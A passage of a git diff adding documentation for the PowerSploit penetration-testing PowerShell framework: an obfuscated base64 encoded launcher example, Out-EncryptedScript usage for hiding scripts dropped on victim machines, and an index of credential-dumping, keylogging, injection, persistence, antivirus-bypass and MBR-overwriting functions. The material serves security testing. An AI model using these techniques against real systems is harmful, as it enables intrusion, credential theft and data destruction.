cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcATABjAGkAeABDAHMASQB3AEUAQQBEAFEAWAAzAEUASQBWAEkAYwBtAEwAaQA1AEsAawBGAEsARQA2AGwAQgBCAFIAWABDADgAaABLAE8ATgBwAEwAawBRAEwANAAzACsAdgBRAGgAdQBqAHkAZABBADkAMQBqAHEAcwAzAG0AaQA1AFUAWABkADAAdgBUAG4ATQBUAEMAbQBnAEgAeAA0AFIAMAA4AEoAawAyAHgAaQA5AE0ANABDAE8AdwBvADcAQQBmAEwAdQBYAHMANQA0ADEATwBLAFcATQB2ADYAaQBoADkAawBOAHcATABpAHMAUgB1AGEANABWAGEAcQBVAEkAagArAFUATwBSAHUAVQBsAGkAWgBWAGcATwAyADQAbgB6AFYAMQB3ACsAWgA2AGUAbAB5ADYAWgBsADIAdAB2AGcAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA= + +Description +----------- +Execute the above payload for the lulz. +\>D + +## PARAMETERS + +### -ScriptBlock +Specifies a scriptblock containing your payload. + +```yaml +Type: ScriptBlock +Parameter Sets: ScriptBlock +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Path +Specifies the path to your payload. + +```yaml +Type: String +Parameter Sets: FilePath +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -NoExit +Outputs the option to not exit after running startup commands. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -NoProfile +Outputs the option to not load the Windows PowerShell profile. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -NonInteractive +Outputs the option to not present an interactive prompt to the user. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Wow64 +Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -WindowStyle +Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -EncodedOutput +Base-64 encodes the entirety of the output. +This is usually unnecessary and effectively doubles the size of the output. +This option is only for those who are extra paranoid. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +This cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kennedy and Josh Kelley's talk, "PowerShell...OMFG" (https://www.trustedsec.com/files/PowerShell_PoC.zip) + +## RELATED LINKS + +[http://www.exploit-monday.com](http://www.exploit-monday.com) + diff --git a/docs/ScriptModification/Out-EncryptedScript.md b/docs/ScriptModification/Out-EncryptedScript.md new file mode 100755 index 00000000..36db457d --- /dev/null +++ b/docs/ScriptModification/Out-EncryptedScript.md @@ -0,0 +1,148 @@ +# Out-EncryptedScript + +## SYNOPSIS +Encrypts text files/scripts. + +PowerSploit Function: Out-EncryptedScript +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Out-EncryptedScript [-ScriptPath] [-Password] [-Salt] + [[-InitializationVector] ] [[-FilePath] ] +``` + +## DESCRIPTION +Out-EncryptedScript will encrypt a script (or any text file for that +matter) and output the results to a minimally obfuscated script - +evil.ps1 by default. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$Password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +Out-EncryptedScript .\Naughty-Script.ps1 $Password salty + +Description +----------- +Encrypt the contents of this file with a password and salt. +This will +make analysis of the script impossible without the correct password +and salt combination. +This command will generate evil.ps1 that can +dropped onto the victim machine. +It only consists of a decryption +function 'de' and the base64-encoded ciphertext. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +[String] $cmd = Get-Content .\evil.ps1 +``` + +Invoke-Expression $cmd +$decrypted = de password salt +Invoke-Expression $decrypted + +Description +----------- +This series of instructions assumes you've already encrypted a script +and named it evil.ps1. +The contents are then decrypted and the +unencrypted script is called via Invoke-Expression + +## PARAMETERS + +### -ScriptPath +Path to this script + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Password +Password to encrypt/decrypt the script + +```yaml +Type: SecureString +Parameter Sets: (All) +Aliases: + +Required: True +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Salt +Salt value for encryption/decryption. +This can be any string value. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -InitializationVector +Specifies a 16-character the initialization vector to be used. +This +is randomly generated by default. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: ((1..16 | ForEach-Object {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join '') +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FilePath +{{Fill FilePath Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: .\evil.ps1 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +This command can be used to encrypt any text-based file/script + +## RELATED LINKS + diff --git a/docs/ScriptModification/Remove-Comment.md b/docs/ScriptModification/Remove-Comment.md new file mode 100755 index 00000000..97335ae1 --- /dev/null +++ b/docs/ScriptModification/Remove-Comment.md @@ -0,0 +1,110 @@ +# Remove-Comment + +## SYNOPSIS +Strips comments and extra whitespace from a script. + +PowerSploit Function: Remove-Comment +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### FilePath (Default) +``` +Remove-Comment [-Path] +``` + +### ScriptBlock +``` +Remove-Comment [-ScriptBlock] +``` + +## DESCRIPTION +Remove-Comment strips out comments and unnecessary whitespace from a script. +This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big. + +A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. +You rock, Lee! + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$Stripped = Remove-Comment -Path .\ScriptWithComments.ps1 +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Remove-Comment -ScriptBlock { +``` + +### This is my awesome script. +My documentation is beyond reproach! + Write-Host 'Hello, World!' ### Write 'Hello, World' to the host +### End script awesomeness +} + +Write-Host 'Hello, World!' + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Remove-Comment -Path Inject-Shellcode.ps1 | Out-EncodedCommand +``` + +Description +----------- +Removes extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand. + +## PARAMETERS + +### -Path +Specifies the path to your script. + +```yaml +Type: String +Parameter Sets: FilePath +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ScriptBlock +Specifies a scriptblock containing your script. + +```yaml +Type: ScriptBlock +Parameter Sets: ScriptBlock +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +### System.String, System.Management.Automation.ScriptBlock + +Accepts either a string containing the path to a script or a scriptblock. + +## OUTPUTS + +### System.Management.Automation.ScriptBlock + +Remove-Comment returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired. + +## NOTES + +## RELATED LINKS + +[http://www.exploit-monday.com +http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/]() + diff --git a/docs/index.md b/docs/index.md new file mode 100644 index 00000000..9c001da0 --- /dev/null +++ b/docs/index.md @@ -0,0 +1,150 @@ +## Overview +PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. + +### CodeExecution +Execute code on a target machine. + + Invoke-DllInjection - Injects a Dll into the process ID of your choosing. + Invoke-ReflectivePEInjection - Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. + Invoke-Shellcode - Injects shellcode into the process ID of your choosing or within PowerShell locally. + Invoke-WmiCommand - Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel + +### ScriptModification +Modify and/or prepare scripts for execution on a compromised machine. + + Out-EncodedCommand - Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. + Out-CompressedDll - Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. + Out-EncryptedScript - Encrypts text files/scripts. + Remove-Comment - Strips comments and extra whitespace from a script. + +### Persistence + +Add persistence capabilities to a PowerShell script. + + New-UserPersistenceOption - Configure user-level persistence options for the Add-Persistence function. + New-ElevatedPersistenceOption - Configure elevated persistence options for the Add-Persistence function. + Add-Persistence - Add persistence capabilities to a script. + Install-SSP - Installs a security support provider (SSP) dll. + Get-SecurityPackage - Enumerates all loaded security packages (SSPs). + +### AntivirusBypass +AV doesn't stand a chance against PowerShell! + + Find-AVSignature - Locates single Byte AV signatures utilizing the same method as DSplit from "class101". + +### Exfiltration +All your data belong to me! + + Invoke-TokenManipulation - Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread. + Invoke-CredentialInjection - Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon). + Invoke-NinjaCopy - Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. + Invoke-Mimikatz - Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz. + Get-Keystrokes - Logs keys pressed, time and the active window. + Get-GPPPassword - Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. + Get-GPPAutologon - Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences. + Get-TimedScreenshot - A function that takes screenshots at a regular interval and saves them to a folder. + New-VolumeShadowCopy - Creates a new volume shadow copy. + Get-VolumeShadowCopy - Lists the device paths of all local volume shadow copies. + Mount-VolumeShadowCopy - Mounts a volume shadow copy. + Remove-VolumeShadowCopy - Deletes a volume shadow copy. + Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials. + Out-Minidump - Generates a full-memory minidump of a process. + Get-MicrophoneAudio - Records audio from system microphone and saves to disk. + +### Mayhem +Cause general mayhem with PowerShell. + + Set-MasterBootRecord - Proof of concept code that overwrites the master boot record with the message of your choice. + Set-CriticalProcess - Causes your machine to blue screen upon exiting PowerShell. + +### Privesc +Tools to help with escalating privileges on a target, including PowerUp. + + PowerUp - Clearing house of common privilege escalation checks, along with some weaponization vectors. + Get-System - GetSystem functionality inspired by Meterpreter's getsystem + +### Recon +Tools to aid in the reconnaissance phase of a penetration test, including PowerView. + + Invoke-Portscan - Does a simple port scan using regular sockets, based (pretty) loosely on nmap. + Get-HttpStatus - Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file. + Invoke-ReverseDnsLookup - Scans an IP address range for DNS PTR records. + PowerView - PowerView is series of functions that performs network and Windows domain enumeration and exploitation. + +## License + +The PowerSploit project and all individual scripts are under the [BSD 3-Clause license](https://raw.github.com/mattifestation/PowerSploit/master/LICENSE) unless explicitly noted otherwise. + +## Usage + +Refer to the comment-based help in each individual script for detailed usage information. + +To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. + +The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" +The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" + +To use the module, type `Import-Module PowerSploit` + +To see the commands imported, type `Get-Command -Module PowerSploit` + +If you're running PowerShell v3 and you want to remove the annoying 'Do you really want to run scripts downloaded from the Internet' warning, once you've placed PowerSploit into your module path, run the following one-liner: +`$Env:PSModulePath.Split(';') | + % { if ( Test-Path (Join-Path $_ PowerSploit) ) + {Get-ChildItem $_ -Recurse | Unblock-File} }` + +For help on each individual command, Get-Help is your friend. + +Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. + +## Contribution Rules + +We need contributions! If you have a great idea for PowerSploit, we'd love to add it. New additions will require the following: + +* The script must adhere to the style guide. Any exceptions to the guide line would need an explicit, valid reason. +* The module manifest needs to be updated to reflect the new function being added. +* A brief description of the function should be added to this README.md +* Pester tests must accompany all new functions. See the Tests folder for examples but we are looking for tests that at least cover the basics by testing for expected/unexpected input/output and that the function exhibits desired functionality. Make sure the function is passing all tests (preferably in mutiple OSes) prior to submitting a pull request. Thanks! + +## Script Style Guide + +**For all contributors and future contributors to PowerSploit, I ask that you follow this style guide when writing your scripts/modules.** + +* Avoid Write-Host **at all costs**. PowerShell functions/cmdlets are not command-line utilities! Pull requests containing code that uses Write-Host will not be considered. You should output custom objects instead. For more information on creating custom objects, read these articles: + * + * + +* If you want to display relevant debugging information to the screen, use Write-Verbose. The user can always just tack on '-Verbose'. + +* Always provide descriptive, comment-based help for every script. Also, be sure to include your name and a BSD 3-Clause license (unless there are extenuating circumstances that prevent the application of the BSD license). + +* Make sure all functions follow the proper PowerShell verb-noun agreement. Use Get-Verb to list the default verbs used by PowerShell. Exceptions to supported verbs will be considered on a case-by-case basis. + +* I prefer that variable names be capitalized and be as descriptive as possible. + +* Provide logical spacing in between your code. Indent your code to make it more readable. + +* If you find yourself repeating code, write a function. + +* Catch all anticipated errors and provide meaningful output. If you have an error that should stop execution of the script, use 'Throw'. If you have an error that doesn't need to stop execution, use Write-Error. + +* If you are writing a script that interfaces with the Win32 API, try to avoid compiling C# inline with Add-Type. Try to use the PSReflect module, if possible. + +* Do not use hardcoded paths. A script should be useable right out of the box. No one should have to modify the code unless they want to. + +* PowerShell v2 compatibility is highly desired. + +* Use positional parameters and make parameters mandatory when it makes sense to do so. For example, I'm looking for something like the following: + * `[Parameter(Position = 0, Mandatory = $True)]` + +* Don't use any aliases unless it makes sense for receiving pipeline input. They make code more difficult to read for people who are unfamiliar with a particular alias. + +* Try not to let commands run on for too long. For example, a pipeline is a natural place for a line break. + +* Don't go overboard with inline comments. Only use them when certain aspects of the code might be confusing to a reader. + +* Rather than using Out-Null to suppress unwanted/irrelevant output, save the unwanted output to $null. Doing so provides a slight performance enhancement. + +* Use default values for your parameters when it makes sense. Ideally, you want a script that will work without requiring any parameters. + +* If a script creates complex custom objects, include a ps1xml file that will properly format the object's output. diff --git a/mkdocs.yml b/mkdocs.yml new file mode 100644 index 00000000..f4a06080 --- /dev/null +++ b/mkdocs.yml @@ -0,0 +1,147 @@ +site_name: PowerSploit +repo_url: https://github.com/PowerShellMafia/PowerSploit/ +site_favicon: favicon.ico +pages: +- Home: 'index.md' +- Recon: + - About: 'Recon/index.md' + - Functions: + - Export-PowerViewCSV: 'Recon/Export-PowerViewCSV.md' + - Resolve-IPAddress: 'Recon/Resolve-IPAddress.md' + - ConvertTo-SID: 'Recon/ConvertTo-SID.md' + - ConvertFrom-SID: 'Recon/ConvertFrom-SID.md' + - Convert-ADName: 'Recon/Convert-ADName.md' + - ConvertFrom-UACValue: 'Recon/ConvertFrom-UACValue.md' + - Add-RemoteConnection: 'Recon/Add-RemoteConnection.md' + - Remove-RemoteConnection: 'Recon/Remove-RemoteConnection.md' + - Invoke-UserImpersonation: 'Recon/Invoke-UserImpersonation.md' + - Invoke-RevertToSelf: 'Recon/Invoke-RevertToSelf.md' + - Get-DomainSPNTicket: 'Recon/Get-DomainSPNTicket.md' + - Invoke-Kerberoast: 'Recon/Invoke-Kerberoast.md' + - Get-PathAcl: 'Recon/Get-PathAcl.md' + - Get-DomainDNSZone: 'Recon/Get-DomainDNSZone.md' + - Get-DomainDNSRecord: 'Recon/Get-DomainDNSRecord.md' + - Get-Domain: 'Recon/Get-Domain.md' + - Get-DomainController: 'Recon/Get-DomainController.md' + - Get-Forest: 'Recon/Get-Forest.md' + - Get-ForestDomain: 'Recon/Get-ForestDomain.md' + - Get-ForestGlobalCatalog: 'Recon/Get-ForestGlobalCatalog.md' + - Find-DomainObjectPropertyOutlier: 'Recon/Find-DomainObjectPropertyOutlier.md' + - Get-DomainUser: 'Recon/Get-DomainUser.md' + - New-DomainUser: 'Recon/New-DomainUser.md' + - Set-DomainUserPassword: 'Recon/Set-DomainUserPassword.md' + - Get-DomainUserEvent: 'Recon/Get-DomainUserEvent.md' + - Get-DomainComputer: 'Recon/Get-DomainComputer.md' + - Get-DomainObject: 'Recon/Get-DomainObject.md' + - Set-DomainObject: 'Recon/Set-DomainObject.md' + - Set-DomainObjectOwner: 'Recon/Set-DomainObjectOwner.md' + - Get-DomainObjectAcl: 'Recon/Get-DomainObjectAcl.md' + - Add-DomainObjectAcl: 'Recon/Add-DomainObjectAcl.md' + - Find-InterestingDomainAcl: 'Recon/Find-InterestingDomainAcl.md' + - Get-DomainOU: 'Recon/Get-DomainOU.md' + - Get-DomainSite: 'Recon/Get-DomainSite.md' + - Get-DomainSubnet: 'Recon/Get-DomainSubnet.md' + - Get-DomainSID: 'Recon/Get-DomainSID.md' + - Get-DomainGroup: 'Recon/Get-DomainGroup.md' + - New-DomainGroup: 'Recon/New-DomainGroup.md' + - Get-DomainManagedSecurityGroup: 'Recon/Get-DomainManagedSecurityGroup.md' + - Get-DomainGroupMember: 'Recon/Get-DomainGroupMember.md' + - Add-DomainGroupMember: 'Recon/Add-DomainGroupMember.md' + - Get-DomainFileServer: 'Recon/Get-DomainFileServer.md' + - Get-DomainDFSShare: 'Recon/Get-DomainDFSShare.md' + - Get-DomainGPO: 'Recon/Get-DomainGPO.md' + - Get-DomainGPOLocalGroup: 'Recon/Get-DomainGPOLocalGroup.md' + - Get-DomainGPOUserLocalGroupMapping: 'Recon/Get-DomainGPOUserLocalGroupMapping.md' + - Get-DomainGPOComputerLocalGroupMapping: 'Recon/Get-DomainGPOComputerLocalGroupMapping.md' + - Get-DomainPolicy: 'Recon/Get-DomainPolicy.md' + - Get-NetLocalGroup: 'Recon/Get-NetLocalGroup.md' + - Get-NetLocalGroupMember: 'Recon/Get-NetLocalGroupMember.md' + - Get-NetShare: 'Recon/Get-NetShare.md' + - Get-NetLoggedon: 'Recon/Get-NetLoggedon.md' + - Get-NetSession: 'Recon/Get-NetSession.md' + - Get-RegLoggedOn: 'Recon/Get-RegLoggedOn.md' + - Get-NetRDPSession: 'Recon/Get-NetRDPSession.md' + - Test-AdminAccess: 'Recon/Test-AdminAccess.md' + - Get-NetComputerSiteName: 'Recon/Get-NetComputerSiteName.md' + - Get-WMIRegProxy: 'Recon/Get-WMIRegProxy.md' + - Get-WMIRegLastLoggedOn: 'Recon/Get-WMIRegLastLoggedOn.md' + - Get-WMIRegCachedRDPConnection: 'Recon/Get-WMIRegCachedRDPConnection.md' + - Get-WMIRegMountedDrive: 'Recon/Get-WMIRegMountedDrive.md' + - Get-WMIProcess: 'Recon/Get-WMIProcess.md' + - Find-InterestingFile: 'Recon/Find-InterestingFile.md' + - Find-DomainUserLocation: 'Recon/Find-DomainUserLocation.md' + - Find-DomainProcess: 'Recon/Find-DomainProcess.md' + - Find-DomainUserEvent: 'Recon/Find-DomainUserEvent.md' + - Find-DomainShare: 'Recon/Find-DomainShare.md' + - Find-InterestingDomainShareFile: 'Recon/Find-InterestingDomainShareFile.md' + - Find-LocalAdminAccess: 'Recon/Find-LocalAdminAccess.md' + - Find-DomainLocalGroupMember: 'Recon/Find-DomainLocalGroupMember.md' + - Get-DomainTrust: 'Recon/Get-DomainTrust.md' + - Get-ForestTrust: 'Recon/Get-ForestTrust.md' + - Get-DomainForeignUser: 'Recon/Get-DomainForeignUser.md' + - Get-DomainForeignGroupMember: 'Recon/Get-DomainForeignGroupMember.md' + - Get-DomainTrustMapping: 'Recon/Get-DomainTrustMapping.md' + - Get-ComputerDetail: 'Recon/Get-ComputerDetail.md' + - Get-HttpStatus: 'Recon/Get-HttpStatus.md' + - Invoke-Portscan: 'Recon/Invoke-Portscan.md' + - Invoke-ReverseDnsLookup: 'Recon/Invoke-ReverseDnsLookup.md' +- Privesc: + - About: 'Privesc/index.md' + - Functions: + - Get-ModifiablePath: 'Privesc/Get-ModifiablePath.md' + - Get-ProcessTokenGroup: 'Privesc/Get-ProcessTokenGroup.md' + - Get-ProcessTokenPrivilege: 'Privesc/Get-ProcessTokenPrivilege.md' + - Enable-Privilege: 'Privesc/Enable-Privilege.md' + - Add-ServiceDacl: 'Privesc/Add-ServiceDacl.md' + - Set-ServiceBinaryPath: 'Privesc/Set-ServiceBinaryPath.md' + - Test-ServiceDaclPermission: 'Privesc/Test-ServiceDaclPermission.md' + - Get-UnquotedService: 'Privesc/Get-UnquotedService.md' + - Get-ModifiableServiceFile: 'Privesc/Get-ModifiableServiceFile.md' + - Get-ModifiableService: 'Privesc/Get-ModifiableService.md' + - Get-ServiceDetail: 'Privesc/Get-ServiceDetail.md' + - Invoke-ServiceAbuse: 'Privesc/Invoke-ServiceAbuse.md' + - Write-ServiceBinary: 'Privesc/Write-ServiceBinary.md' + - Install-ServiceBinary: 'Privesc/Install-ServiceBinary.md' + - Restore-ServiceBinary: 'Privesc/Restore-ServiceBinary.md' + - Find-ProcessDLLHijack: 'Privesc/Find-ProcessDLLHijack.md' + - Find-PathDLLHijack: 'Privesc/Find-PathDLLHijack.md' + - Write-HijackDll: 'Privesc/Write-HijackDll.md' + - Get-RegistryAlwaysInstallElevated: 'Privesc/Get-RegistryAlwaysInstallElevated.md' + - Get-RegistryAutoLogon: 'Privesc/Get-RegistryAutoLogon.md' + - Get-ModifiableRegistryAutoRun: 'Privesc/Get-ModifiableRegistryAutoRun.md' + - Get-ModifiableScheduledTaskFile: 'Privesc/Get-ModifiableScheduledTaskFile.md' + - Get-UnattendedInstallFile: 'Privesc/Get-UnattendedInstallFile.md' + - Get-WebConfig: 'Privesc/Get-WebConfig.md' + - Get-ApplicationHost: 'Privesc/Get-ApplicationHost.md' + - Get-SiteListPassword: 'Privesc/Get-SiteListPassword.md' + - Get-CachedGPPPassword: 'Privesc/Get-CachedGPPPassword.md' + - Write-UserAddMSI: 'Privesc/Write-UserAddMSI.md' + - Invoke-WScriptUACBypass: 'Privesc/Invoke-WScriptUACBypass.md' + - Invoke-PrivescAudit: 'Privesc/Invoke-PrivescAudit.md' + - Get-System: 'Privesc/Get-System.md' +- AntiVirus: + - Functions: + - Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md' +- CodeExecution: + - Functions: + - Invoke-DllInjection: 'CodeExecution/Invoke-DllInjection.md' + - Invoke-ReflectivePEInjection: 'CodeExecution/Invoke-ReflectivePEInjection.md' + - Invoke-Shellcode: 'CodeExecution/Invoke-Shellcode.md' + - Invoke-WmiCommand: 'CodeExecution/Invoke-WmiCommand.md' +- Mayhem: + - Functions: + - Set-MasterBootRecord: 'Mayhem/Set-MasterBootRecord.md' + - Set-CriticalProcess: 'Mayhem/Set-CriticalProcess.md' +- Persistence: + - Functions: + - New-ElevatedPersistenceOption: 'Persistence/New-ElevatedPersistenceOption.md' + - New-UserPersistenceOption: 'Persistence/New-UserPersistenceOption.md' + - Add-Persistence: 'Persistence/Add-Persistence.md' + - Install-SSP: 'Persistence/Install-SSP.md' + - Get-SecurityPackage: 'Persistence/Get-SecurityPackage.md' +- ScriptModification: + - Functions: + - Out-CompressedDll: 'ScriptModification/Out-CompressedDll.md' + - Out-EncodedCommand: 'ScriptModification/Out-EncodedCommand.md' + - Out-EncryptedScript: 'ScriptModification/Out-EncryptedScript.md' + - Remove-Comment: 'ScriptModification/Remove-Comment.md'